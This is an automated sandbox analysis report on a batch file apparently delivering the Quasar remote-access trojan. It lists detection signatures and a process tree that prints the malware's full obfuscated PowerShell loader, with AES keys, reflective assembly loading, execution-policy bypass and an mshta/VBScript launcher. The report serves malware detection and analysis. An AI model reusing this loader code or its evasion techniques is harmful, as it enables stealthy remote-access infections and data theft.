Windows Analysis Report
Shadow-Stealer.bat

Overview

General Information

Sample Name:Shadow-Stealer.bat
Analysis ID:1352637
MD5:cf5b412ffc3ce43cd7ddce602fc67f56
SHA1:221dfcd0868158f676c472d8a5bcf9647f0c7d51
SHA256:84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724
Tags:bat

Detection

Quasar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Quasar RAT
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Costura Assembly Loader
Renames powershell.exe to bypass HIPS
Powershell is started from unusual location (likely to bypass HIPS)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Deletes itself after installation
Found large BAT file
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Powershell connects to network
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Writes to foreign memory regions
Bypasses PowerShell execution policy
Very long command line found
Suspicious powershell command line found
Obfuscated command line found
Modifies the context of a thread in another process (thread injection)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates COM task schedule object (often to register a task for autostart)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Allocates memory with a write watch (potentially for evading sandboxes)
Detected TCP or UDP traffic on non-standard ports
Found evasive API chain (may stop execution after accessing registry keys)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

  • System is w10x64
  • cmd.exe (PID: 1668 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Shadow-Stealer.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Shadow-Stealer.bat.exe (PID: 3180 cmdline: "Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN')); MD5: 04029E121A0CFA5991749937DD22A1D9)
      • dllhost.exe (PID: 3940 cmdline: C:\Windows\System32\dllhost.exe /Processid:{2ca74e05-00fd-4f33-afb0-1baa728859ba} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • dllhost.exe (PID: 1036 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{a795ed5e-f9f8-4b9c-9e39-bf732c676d16} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
      • dllhost.exe (PID: 5576 cmdline: C:\Windows\System32\dllhost.exe /Processid:{3885b722-1a15-44b5-b09d-ff91e5413f87} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • dllhost.exe (PID: 964 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{99a849d9-b898-48bd-a9ae-8d2739f763c9} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
  • $sxr-mshta.exe (PID: 2616 cmdline: C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • $sxr-cmd.exe (PID: 1804 cmdline: "C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=% MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • $sxr-powershell.exe (PID: 6400 cmdline: C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = 
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = 
[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = 
[Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG))) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • dllhost.exe (PID: 1088 cmdline: C:\Windows\System32\dllhost.exe /Processid:{8c0db931-f9fd-42d4-a5c0-43590a2016f6} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
        • dllhost.exe (PID: 5772 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{c14234ed-73ac-4d78-a200-79518435a2b0} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
        • $sxr-powershell.exe (PID: 5672 cmdline: "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6400).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = 
[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = 
$qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = 
[Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG))) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • dllhost.exe (PID: 6336 cmdline: C:\Windows\System32\dllhost.exe /Processid:{cbe0811f-76a5-44cc-bdc5-f8341ab968a9} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
          • winlogon.exe (PID: 560 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
            • dllhost.exe (PID: 5204 cmdline: C:\Windows\System32\dllhost.exe /Processid:{92e841ec-e3f1-4b8b-895f-b885255cbce1} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
              • svchost.exe (PID: 436 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
              • svchost.exe (PID: 376 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
              • svchost.exe (PID: 60 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • dllhost.exe (PID: 3784 cmdline: C:\Windows\System32\dllhost.exe /Processid:{2e416721-4f03-488b-85bf-d48d4305e55d} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
